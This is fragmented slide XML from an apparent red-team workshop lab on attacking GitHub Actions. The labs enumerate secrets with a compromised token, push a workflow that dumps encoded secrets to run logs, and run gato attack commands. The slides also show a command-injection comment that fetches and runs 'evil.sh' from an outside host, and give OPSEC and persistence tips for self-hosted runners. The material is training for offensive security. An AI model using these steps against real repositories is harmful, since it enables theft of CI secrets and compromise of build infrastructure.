          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1147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4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Scenario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Obtained GitHub PAT for Sharp Bets developer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Enumerated Org memberships &amp; Repos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4400" b="1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4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Lab Objectives</a:t>
                      </a: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Identify Org, Repo, and Environment secrets</a:t>
                      </a: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Create a branch for a malicious workflow</a:t>
                      </a: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Dump secrets via SaaS runners in GitHub Actions </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="18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Freeform 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835F3CB6-156E-18F3-71E2-1842F3BA2CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="853692">
            <a:off x="-5984826" y="6964265"/>
            <a:ext cx="12348139" cy="10035669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12348139" h="10035669">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12348140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12348140" y="10035670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10035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7782E26E-CE21-A823-5CF5-86ABD51B85C6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6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Lab 02: Secrets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592604"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881989" cy="7498520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9852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This slide is a reference for how to identify secrets using the API – very useful for private repos or if you’re limited to only using a PAT! In the interest of time, skip this slide and the next to continue the lab. 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For each of the following curl commands, use the following syntax prior to the target &lt;URL&gt;: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curl -L -H "Accept: application/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vnd.github+json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" -H "Authorization: Bearer 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ghp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_&lt;token&gt;" -H "X-GitHub-Api-Version: 2022-11-28" &lt;URL&gt;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List Organization secrets - may not be directly accessible and get 403, but accessible later via Org repos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URL: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https://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api.github.com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/orgs/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/actions/secrets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List Organization secrets accessible via target repo, find “FLAG_02”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URL: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https://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api.github.com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/repos/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-app-dev/actions/organization-secrets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List repo secrets, find “FLAG_01”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URL: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https://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api.github.com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/repos/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-app-dev/actions/secrets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List Environments, find “dev” environment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URL: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https://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api.github.com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/repos/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-app-dev/environments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List Environment secrets, find “FLAG_03”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URL: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https://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api.github.com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/repos/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-app-dev/environments/dev/secrets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928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Lab 02: Secrets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61121"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881990" cy="7498520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5947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4701">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="56979009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="749852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If you have UI access as a repository owner, you can also view the accessible secrets by going to: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&gt; Settings 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&gt; Secrets and variables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&gt; Actions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Want a one-liner with </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="12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gato</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="1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? Will miss Environment secrets!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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="12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gato</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="12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-s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="12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enum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="12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--self-enumeration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D9D1622-CBFD-3C57-BDB1-F14DFAD36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2156" y="2557769"/>
            <a:ext cx="10546194" cy="6969338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="69074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09331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Lab 02: Secrets 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037349"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="7096379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We know the names of the secrets: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FLAG_01</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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FLAG_02</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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FLAG_03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These are available to us in the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{{ secrets }}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context during workflows.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1) Let’s dump them using a malicious workflow. Clone the ‘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-app-dev’ repo.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git clone https://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github.com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-app-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dev.git</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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cd 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-app-dev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2) Create a new temporary branch. Give it a unique name so it does not clash with others!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git checkout –b &lt;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unique_branch_name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&gt;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1" indent="-4572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lvl="1" indent="-457200" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3639"/>
                        </a:lnSpc>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod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610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Lab 02: Secrets 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284582"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="17072489" cy="7647115"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="17072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3722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3) Create the malicious workflow file. Can copy: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https://github.com/sharpbets/materials/lab02-secrets/debug.yml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endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1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NOTE: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Change the value of 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branches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to match your unique branch name.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This workflow file has OPSEC issues and is meant as a starter template to showcase functionality. Take the extra precautionary steps on real assessments to protect sensitive data in logs.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vim .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/workflows/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debug.yml</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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4) Add and commit the file to your branch.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git add .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/workflows/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debug.yml</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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git -c 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user.email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="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sharpbets-joe@users.noreply.github.com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" -c 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user.name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="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-joe" commit -a -m 'debug’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5) Push your branch back to GitHub (uses the compromised PAT)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export GH_TOKEN=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ghp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_&lt;token&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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git remote set-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url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origin https://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-joe:$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GH_TOKEN@github.com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-app-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dev.git</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1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git push -u origin &lt;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unique_branch_name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&gt;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200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Lab 02: Secrets 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14957"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="8102219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6) Check the Actions page to see your workflow!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https://github.com/sharpbets/sharpbets-app-dev/actions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Won’t be able to view the logs unless authenticated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Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> 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Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Good news though –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for public repos, you can be any authenticated user!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*For private repositories, or if limited to tokens, you’ll have to retrieve the run logs via the API.  Curl URLs below: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Get Run ID (ex: 10255251425)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URL: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https://api.github.com/repos/sharpbets/sharpbets-app-dev/actions/runs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| grep -B 1 “debug”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Get Job ID (ex: 2871393502)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URL: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https://api.github.com/repos/sharpbets/sharpbets-app-dev/actions/runs/RUN_ID/jobs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Get Job Logs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URL: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https://api.github.com/repos/sharpbets/sharpbets-app-dev/actions/jobs/JOB_ID/logs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</a:p>
                    <a:p>
                      <a:pPr marL="802638" lvl="1" indent="-457200" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3639"/>
                        </a:lnSpc>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod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8BF5F3-6617-8D45-FC3D-118FBF539C9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2177" b="1429"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819643" y="4175688"/>
            <a:ext cx="10648715" cy="2834640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="68028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017177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Lab 02: Secrets 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681479"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="5267579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7) Decode the secrets from the run logs! Our workflow used double base64 encoding, super spicy.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echo “&lt;base64 output from run log&gt;” | base64 –d | base64 –d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FLAG_01=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Ippei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-Ki-Yay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FLAG_02=1919Bl@ckS0x!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FLAG_03=flag3secretyay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*Bonus: The automated way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gato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-s attack -t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-app-dev --secrets --delete-action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802638" lvl="1" indent="-457200" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3639"/>
                        </a:lnSpc>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod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498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038848">
            <a:off x="-2875713" y="8057108"/>
            <a:ext cx="6920917" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6920917" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6920918" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6920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555453" y="1095375"/>
            <a:ext cx="7703847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What is DevOps?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240995"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1705074" y="3597224"/>
          <a:ext cx="14877852" cy="5887720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3157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0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13272">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="31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“DevOps is a cultural and collaborative mindset that emphasizes communication, collaboration, integration, and automation between development and operations teams in order to achieve faster and more reliable software delivery.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="383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3839"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="31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This includes tasks such as designing and building automation frameworks, implementing Continuous Integration/Continuous Delivery (CI/CD) pipelines, managing infrastructure as code, and monitoring and logging systems.”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endParaRPr lang="en-US" sz="3199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algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3359"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="27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@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2799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kamrify</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2799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algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3919"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2799" u="sng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5" tooltip="https://roadmap.sh/devops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https://roadmap.sh/devops</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="27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algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3079"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2799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3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="31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“DevOps is a cultural and collaborative mindset that emphasizes communication, collaboration, integration, and automation between development and operations teams in order to achieve faster and more reliable software delivery.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="383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3839"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="31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This includes tasks such as designing and building automation frameworks, implementing Continuous Integration/Continuous Delivery (CI/CD) pipelines, managing infrastructure as code, and monitoring and logging systems.”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endParaRPr lang="en-US" sz="3199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algn="r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@kamrify</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3919"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2799" u="sng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5" tooltip="https://roadmap.sh/devops"/>
                        </a:rPr>
                        <a:t>https://roadmap.sh/devops</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="27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algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3079"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2799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 rot="4013324">
            <a:off x="17144809" y="5207294"/>
            <a:ext cx="3775344" cy="2244614"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3775344" h="2244614">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3775345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3775345" y="2244614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2244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48439">
            <a:off x="7812382" y="9770873"/>
            <a:ext cx="2653737" cy="1577767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2653737" h="1577767">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2653738" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2653738" y="1577768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1577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22F2EB5D-CB99-4CD9-C4FD-57148B954266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-990888" flipV="1">
            <a:off x="-1515295" y="-1523769"/>
            <a:ext cx="10372410" cy="3752926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10372410" h="3752926">
                <a:moveTo>
                  <a:pt x="0" y="3752926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10372409" y="3752926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10372409" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3752926"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6">
              <a:alphaModFix amt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BFB65-B47B-9E90-50D5-B6FC7015B05C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705074" y="3597224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961599" y="-2782197"/>
            <a:ext cx="11098426" cy="16596766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11098426" h="16596766">
                <a:moveTo>
                  <a:pt x="11098426" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16596766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11098426" y="16596766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28700" y="3078063"/>
            <a:ext cx="7414512" cy="4190760"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="55876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75"/>
              <a:ext cx="9243864" cy="3099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Code Execution</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="11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Public PPE Primitives</a:t>
              </a:r>
            </a:p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Self-Hosted Runners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2402430-C3C7-892B-E6BF-ED64A51F40ED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4" descr="Implementing a simple Python CI/CD pipeline using Github Actions – part 1.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE431310-5768-F4DC-2DDD-C1AC79DFC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5" t="21997" r="39023" b="33002"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10334375" y="5516186"/>
            <a:ext cx="2862072" cy="28620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Writing your first pipeline using GitLab CI/CD | by ag | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4528DA4B-D7E5-56E9-9F1E-2572516E6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4" t="40957" r="48994" b="21809"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10334375" y="2281428"/>
            <a:ext cx="2862072" cy="28620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763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453963"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="89272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4921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When a workflow event is triggered, attributes about the event are passed to the workflow. Some of those values are user-controlled.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Examples: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github.event.issue.body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github.event.issue.title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github.event.comment.body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github.event.pull_request.body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github.event.pull_request.title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github.event.pull_request.head.label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And more...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Workflows can be vulnerable is they pass these values into unsafe expressions.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Example workflow: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run: echo {{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github.event.comment.body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}}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Malicious comment: “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; curl https://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a.b.c.d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evil.sh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| bash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”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run: echo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; curl https://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a.b.c.d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evil.sh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| bash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Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3685576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Forked Workflows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472901"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881990" cy="8470075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5490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1901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3310629261"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1554921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What if you don’t have repo access? Leverage forks.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Workflows from forks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By default, first-time contributors have to be approved!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Not that hard to become a contributor in some cases…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https://johnstawinski.com/2024/04/15/fixing-typos-and-breaching-microsofts-perimeter/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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Check pull requests from other contributors, see if each PR requires approval or if you only need to be a contributor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DAF06-84D8-466B-0E19-2021ACB789B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1244"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10897314" y="2607192"/>
            <a:ext cx="6400800" cy="3418705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66000"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50178" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C1D748-A294-E290-CBCD-8640EF4F0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6689909"/>
            <a:ext cx="10546819" cy="3355389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66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539A88-BD11-79E1-3CA4-6CA93C143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9800" y="2447539"/>
            <a:ext cx="6885827" cy="3817303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66000"/>
              </a:srgbClr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325CEDE8-E271-A047-46F9-427B45199653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="4991100"/>
            <a:ext cx="6352427" cy="693300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005FE97C-0B2E-C975-EA40-9D6CC5623672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13106400" y="3822595"/>
            <a:ext cx="2714836" cy="533595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121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Dangerous Triggers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426765"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881990" cy="7555675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8614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7701">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2026622440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1554921">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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Trigger: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pull_request_target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Run in context of the base branch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Considered trusted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Always run, regardless of approval settings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Checkout and run code from PR branch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OPSEC: Use ”draft” pull request – repo maintainers won’t be notified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Targeting tip: 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Runners often exist in different environments (e.g., one is on-prem, one is in AWS, etc.)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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Leverage Labels and Tags – get the runner you want by specifying these! Linux usually more OPSEC-safe than Windows.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Tool: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octoscan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https://github.com/synacktiv/octoscan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8BE95-1D01-1F56-BDEC-93ED0FB96A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3314700"/>
            <a:ext cx="7867650" cy="3923660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66731"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln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29AD8817-10AA-ECB8-E848-826562EC6EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9525000" y="5981702"/>
            <a:ext cx="7086600" cy="838200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952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343226"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="75556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4921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Code execution via Actions is cool, but what about persistence?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LOLBAS (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https://lolbas-project.github.io/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) &amp;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GTFOBins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(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https://gtfobins.github.io/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) are your friend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Runners typically have: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Internet connectivity (to download packages) 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Passwordless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sudo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access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Self-hosted runners are not usually ephemeral, can persist outside of working directory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Runner-over-Runner (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RoR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) – use workflow steps to install a secondary runner, but point the new runner towards your private C2 repo… Brilliant.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Talk: Grand Theft Actions: Abusing Self-Hosted GitHub Runners at Scale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Saturday at 12:00 in LVCC - L1 - HW1-11-04 (Track 4)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Adnan Khan (@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adnanthekhan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), John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Stawinski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(https://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johnstawinski.com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/)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Release of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gato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-x</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="233677" lvl="0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0" lvl="0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Post-exploitation targets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Artifacts/secrets/env vars from other workflows that get executed, both past and future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Pivot point to other network segments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Runner Post-Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399598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702812"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="61840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Features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Token validation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Repository and permission enumeration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Secrets exfiltration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Self-hosted runner identification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Workflow enumeration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Friendly IOCs, know your tools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Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>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Wingdings" pitchFamily="2" charset="2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Tool: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https://github.com/praetorian-inc/gato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BFE5E924-5A1F-676C-88DD-EF860B5B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412159"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11066036" y="2447925"/>
          <a:ext cx="6193264" cy="482600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="298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5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921">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199" dirty="0" err="1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gato</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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ts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199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It’s a target-rich environment.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/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GitHub Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="90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TOolkit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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32770" name="Picture 2" descr="gato">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E91AFA86-6A1D-1E17-606A-C43A0959E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338" y="2222734"/>
            <a:ext cx="4894208" cy="63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613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028700" y="3078063"/>
            <a:ext cx="7414512" cy="3754743"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="500632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75"/>
              <a:ext cx="9243864" cy="3099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4E7E7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Lab 03</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015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Public PPE on Self-Hosted Runner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2402430-C3C7-892B-E6BF-ED64A51F40ED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7C17BDE4-B80A-3244-F05B-0FA0C43FA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481731"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6324601" y="1047270"/>
          <a:ext cx="11472470" cy="4419600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1147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4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Scenario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No access has been compromised for target Organization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Gain code execution on internal network via PPE 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4400" b="1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4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Lab Objectives</a:t>
                      </a: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Identify vulnerable public workflows using self-hosted runner</a:t>
                      </a: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Inject malicious code into workflow via Issue comment</a:t>
                      </a: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Inject malicious code into workflow via fork &amp; pull request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Freeform 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835F3CB6-156E-18F3-71E2-1842F3BA2CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="853692">
            <a:off x="-5984826" y="6964265"/>
            <a:ext cx="12348139" cy="10035669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
